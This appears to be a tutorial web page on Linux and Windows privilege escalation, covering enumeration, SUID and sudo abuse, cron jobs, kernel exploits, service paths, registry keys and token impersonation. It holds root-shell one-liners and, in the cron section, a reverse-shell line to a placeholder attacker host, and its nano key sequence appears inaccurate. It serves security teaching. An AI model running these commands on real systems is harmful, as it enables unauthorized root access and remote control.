Introduction to Privilege Escalation
Privilege escalation is a critical step in both offensive and defensive cybersecurity, where gaining unauthorized elevated access—such as administrative or root access—enables actions like reading sensitive data, installing programs, or changing system settings. This can occur through vertical privilege escalation, where a regular user escalates to an administrator or root, or horizontal privilege escalation, where a user accesses another user’s resources at the same privilege level. In the context of post-exploitation, privilege escalation is vital for attackers to gain full control over a system, allowing them to persist, move laterally through the network, and potentially exfiltrate data. Once higher privileges are obtained, attackers may establish persistence by creating new user accounts, installing backdoors, or modifying system scripts to maintain access. For defenders, understanding privilege escalation is key to detecting unauthorized access and securing systems against these types of attacks.
Video Credit: The Cyber Mentor - Privilege Escalation
Linux Privilege Escalation
In Linux environments, privilege escalation is often achieved by exploiting system misconfigurations, vulnerable software, or weak file permissions. The goal is to elevate access from a normal user to root (the superuser), giving full control over the system.
Tools Required
Several tools can help you gather the necessary information for privilege escalation. These tools automate enumeration and vulnerability checking:
- LinEnum: Automates the enumeration of the Linux system.
- Linux Exploit Suggester: Suggests potential kernel exploits based on the system’s version.
- Linux Smart Enumeration (LSE): Smart tool to check for privilege escalation vectors in Linux.
- PEASS-ng: A collection of tools to help escalate privileges, including both Windows and Linux scripts.
Enumerating System Information
Before attempting privilege escalation, you must gather detailed information about the system. This will help you identify potential weaknesses that you can exploit. Start by using the following commands:
uname -a # Get kernel version hostname # Get the system hostname whoami # Check your current user privileges id # Get user and group IDs
For example, uname -a
returns information about the kernel version and architecture, which helps determine whether a kernel exploit may be applicable. The whoami
command confirms your current privileges, and id
shows your user and group IDs, which are critical for understanding which resources you have access to.
Checking for SUID Files
On Linux systems, SUID (Set User ID) files allow programs to be executed with the privileges of the file's owner, which is often root. Misconfigured SUID files can be exploited to escalate privileges.
Use the following command to find SUID files:
find / -perm -4000 2>/dev/null
This command searches the entire file system for files with the SUID bit set. Look for common exploitable files, such as /bin/bash
or /usr/bin/sudo
. If you find an SUID binary owned by root, there’s a chance it can be exploited to gain root access.
Example Exploit: SUID Bash Binary
If the /bin/bash
binary is misconfigured with SUID permissions, you can run the following command to gain root access:
/bin/bash -p
The -p
flag preserves the SUID permissions, allowing you to execute Bash with root privileges.
Exploiting Misconfigured Sudo Permissions
Users often have permissions to run specific commands as root using sudo
. If these commands are misconfigured, they can be exploited to escalate privileges. To check your sudo permissions, use:
sudo -l
If you are allowed to run certain commands without a password, you might be able to exploit these commands to gain root access. For example, if you have permission to run /bin/bash
as root, you can escalate privileges like this:
sudo /bin/bash
You now have a root shell!
Exploiting Specific Commands
Sometimes you might have permission to run specific commands, like nano
, vim
, or even editors like vi
. These can be leveraged to spawn a root shell by executing commands from within the editor’s shell mode:
sudo nano
Then press Ctrl + X
to enter command mode and execute:
!bash
This will drop you into a root shell.
Exploiting Cron Jobs
Cron jobs are scheduled tasks that run periodically. If a cron job is misconfigured, you might be able to inject malicious commands that will run with elevated privileges. First, check for cron jobs using:
cat /etc/crontab
Inspect the output to see if any scripts or commands are being run by root
. If these scripts are writable, you can modify them to include your payload.
Example Exploit: Writable Cron Script
Suppose you find a script, /usr/local/bin/backup.sh
, that is run by root
every hour. If the script is writable, you can append the following line to spawn a root shell:
echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /usr/local/bin/backup.sh
This command will spawn a reverse shell to your attack machine, giving you root access when the cron job runs.
Kernel Exploits
If the Linux kernel is outdated, you may be able to exploit a known vulnerability to escalate privileges. Tools like linux-exploit-suggester
will help you identify which exploits are applicable based on the system’s kernel version.
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh
Run the script and analyze the output. If an applicable kernel exploit is suggested, research the exploit further and attempt it.
Windows Privilege Escalation
Windows privilege escalation often involves exploiting misconfigurations in services, registry keys, or file permissions. Here are the most common methods used to escalate privileges on Windows systems.
Tools Required
- PowerSploit: A PowerShell framework for offensive security.
- JAWS: A script for Windows privilege escalation enumeration.
- Seatbelt: A C# enumeration tool for privilege escalation.
Enumerating System Information
Similar to Linux, begin by gathering information about the Windows system. The following commands will give you critical information:
systeminfo # Detailed system information whoami /priv # View privileges of the current user
Look for any enabled privileges that you may be able to exploit, such as SeImpersonatePrivilege
or SeBackupPrivilege
.
Abusing Unquoted Service Paths
Unquoted service paths are a common misconfiguration that can be exploited. If a service is configured with an unquoted path, an attacker can place a malicious executable in the path to gain elevated privileges.
sc qc [ServiceName]
If the service path is unquoted and there are spaces in the path, place a malicious binary in a higher directory to be executed instead of the intended executable.
Exploiting Insecure Registry Permissions
The Windows registry stores system settings, and if certain registry keys have insecure permissions, you can modify them to escalate privileges. Use the following command to query registry permissions:
reg query HKLM /s /v "Start"
If a key is writable, modify it to point to a malicious executable or script that will run with SYSTEM privileges.
Using Token Impersonation
Windows uses tokens to manage user permissions. If you have the SeImpersonatePrivilege
, you can impersonate a higher-privileged user. Tools like PrintSpoofer
or Juicy Potato
can automate this process.